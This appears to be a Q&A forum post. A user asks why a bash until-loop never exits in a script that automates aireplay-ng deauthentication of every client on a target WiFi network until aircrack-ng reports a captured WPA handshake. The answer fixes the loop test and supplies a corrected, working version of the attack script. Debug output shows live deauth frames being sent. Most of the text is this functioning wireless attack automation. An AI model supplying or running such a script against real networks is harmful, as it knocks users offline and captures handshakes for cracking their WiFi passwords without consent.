bash until loop true when condition returns anything

Question

Trying to figure out how to get this until loop to kill the script when it actually has any data returned. i've tried -z, -n etc with no luck. This script is designed to take any airodump-ng output for a specific BSSID (in csv format), and iterate through each station and deauthenticate them infinitely on a period of 5m until $SUCCESS returns that a 4way handshake was captured

Any help would be greatly appreciated!

#!/bin/bash
#Need to get the BSSID Name
echo "BSSID Name? (Case Sensitive): "
read BSSIDNAME

BSSID=$(cat "$1" | awk -F',' 'NR>2{print $1}' | sed -e '/Station MAC/d' -e '/BSSID/d' -e '/\n/d' | sed -n 1p)

until [ "$SUCCESS" -n ]; do
  for STATION in $(cat "$1" | awk -F',' 'NR>5{print $1}' | sed -e '/Station MAC/d' -e '/BSSID/d' | sed -e '/^.$/d' ); do
          aireplay-ng --deauth 5 -a $BSSID -c $STATION wlan1mon;
          sleep 5s;
  done
SUCCESS=$(aircrack-ng "${BSSIDNAME}-01.cap" -w fakewordlist | grep "WPA (. handshake)")
done

Here is the debug output. You can see that it loops even though we recieved a handshake.

root@Pineapple:/sd/pcap# sh -x ./autodeauth.sh attackme-01.csv
+ echo BSSID Name? (Case Sensitive):
BSSID Name? (Case Sensitive):
+ read BSSIDNAME
attackme
+ + + sed -n 1p
awk -F, NR>2{print $1}
sed -e /Station MAC/d -e /BSSID/d -e /\n/d
+ cat attackme-01.csv
+ BSSID=00:11:11:11:11:11
+ [  -n ]
sh: -n: unknown operand
+ awk+  -F,sed+  NR>5{print $1} -esed
 /Station MAC/d -e -e /^.$/d /BSSID/d

+ cat attackme-01.csv
+ aireplay-ng --deauth 5 -a 00:11:11:11:11:11 -c DE:AD:BE:EF:00:00 wlan1mon
05:41:31  Waiting for beacon frame (BSSID: 00:11:11:11:11:11) on channel 6
05:41:31  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:00] [ 0|58 ACKs]
05:41:32  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:00] [ 0|60 ACKs]
05:41:33  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:00] [ 0|55 ACKs]
05:41:33  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:00] [ 0|56 ACKs]
05:41:34  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:00] [ 0|58 ACKs]
+ sleep 5s
+ aireplay-ng --deauth 5 -a 00:11:11:11:11:11 -c DE:AD:BE:EF:00:01 wlan1mon
05:41:39  Waiting for beacon frame (BSSID: 00:11:11:11:11:11) on channel 6
05:41:40  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:01] [ 0|49 ACKs]
05:41:40  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:01] [ 0|56 ACKs]
05:41:41  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:01] [ 0|56 ACKs]
05:41:41  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:01] [ 0|60 ACKs]
05:41:42  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:01] [ 0|63 ACKs]
+ sleep 5s
+ grep WPA (. handshake)
+ aircrack-ng attackme-01.cap -w fakewordlist
+ SUCCESS=   1  00:11:11:11:11:11  attackeme                     WPA (1 handshake)
+ [    1  00:11:11:11:11:11  attackme                     WPA (1 handshake) -n ]
sh: -n: unknown operand

Answer 1

The line:

SUCCESS=$(something)

will run something once and store the output into the SUCCESS environment variable.

Your until loop body never runs that command explicitly so I think you may believe that $SUCCESS in the until statement is somehow running the command.

That is not the case. It's simply re-evaluating the SUCCESS variable. You need to explicitly re-run the command, such as with:

SUCCESS=$(aircrack-ng "${BSSID}-01.cap" -w fakewordlist | grep "WPA (. handshake)")
until [ -n "$SUCCESS" ]; do
  for STATION in $(cat "$1" | awk -F',' 'NR>5{print $1}' | sed -e '/Station MAC/d' -e '/BSSID/d' -e '/\n/d'); do
    aireplay-ng --deauth 5 -a $BSSID -c $STATION wlan1mon;
    sleep 5m;
  done
  SUCCESS=$(aircrack-ng "${BSSID}-01.cap" -w fakewordlist | grep "WPA (. handshake)")
done

Without that penultimate line, the SUCCESS variable is never actually changing, which would explain why your loop never exits.

---

You'll hopefully notice the other change that I made to your code, that of changing the line:

until [ "$SUCCESS" -n ]; do

into:

until [ -n "$SUCCESS" ]; do

The latter is the correct way to test if the SUCCESS environment variable holds a non-empty string.